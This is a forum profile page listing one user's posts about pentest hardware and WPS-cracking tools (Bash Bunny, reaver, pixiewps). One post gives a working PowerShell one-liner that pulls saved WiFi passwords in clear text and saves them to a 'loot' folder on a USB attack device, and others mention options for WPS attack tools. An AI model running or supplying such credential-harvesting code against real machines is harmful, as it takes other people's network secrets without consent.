Jump to content

DataHead

Active Members
  • Posts

    347
  • Joined

  • Last visited

  • Days Won

    11

Profile Information

  • Gender
    Male

Recent Profile Visitors

5,296 profile views

DataHead's Achievements

Newbie

Newbie (1/14)

  1. I had drilled a few little holes on the vertical USB side of the casing. It stays a bit cooler. It still heats up a fair amount but nothing at all like before.
  2. this is old, but.. does the following work for you? $'$Bunny = (gwmi win32_volume -f \'label=\'\'BashBunny\'\'\' | Select-Object -ExpandProperty DriveLetter) (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-File $Bunny\loot\WiFiCreds\WiFi.txt' Dollar qoutes $' ' for this purpose should work, only \ escaping your ' characters. >echo $'isn\'t this easier?' >isn't this easier?
  3. The version that comes stock in kali 2.0 is not the latest. I have no clue why upon kali 2's release, they chose to use a rather old version. The current version IIRC also credits wiire & kib0rg in the help output ( and maybe some others )
  4. Ive made documentation available in the help when it was implemented. I would assume you have not compiled the latest from the github repo
  5. In the middle of last year or so, i had put in the option -H to reaver, save the information to a (bssid).pixie file, which in turn is executable as a bash script that contains a full command for pixiewps. Though not as feature / option rich as your program, maybe you can take advantage of the already in place feature? Great work! Keep it up
  6. Avoid a lockout in reaver ( our modified fork on t6x github ) with -P option. It will loop upto m4 message. Which in return never fully pins the target ap, but just collects all the pertinent hashes for pixiewps.
  7. Nice to see it! Cant wait to get some goodies built and running on this bad boy! >:)
  8. It is an opensource platform. Yes. However, They do have their own closed source applications. could you be a bit more specific about what you are trying to accomplish?
  9. I don't give a crap who you are, this... Is... exciting!!! I want to see what this deliciously sexy beast is, and what it's all about! I Demand more of this nerd porn!!! Maybe that's a bit too far.. but I can only imagine what this doodad is, what it features, improvements etc. Something with a nice design like that, screams goodness :-) can't wait to hear all about it!
  10. Eh, no. Not any.. It will have to be cross compiled. It needs to be the same architecture configuration i have cross compiled version 3.8.1 ( not sure if you require the lower version, nor do i know if any is avail on the repos ) just after you download it, rename the .zip extension to .ipk. as the forum restrictions do not accept files with the .ipk externsion. logrotate_3.8.1-1_ar71xx.zip EDIT: screw it, here's 3.9.1 and 3.7.1 logrotate_3.9.1-1_ar71xx.zip logrotate_3.7.1-1_ar71xx.zip
  11. I had to... Now, I'm sure there will be info on the stock soon, I think Darren tweeted along the lines of the 16th there MIGHT be some updates written to us of the supply.
  12. The NEH is not supportive of 5ghz. It supports 2.4ghz wireless-n, but is not 5ghz. Also, remember that 5ghz will not travel as far as 2.4ghz can. but 5ghz supportive, will give a better connection experience.
×
×
  • Create New...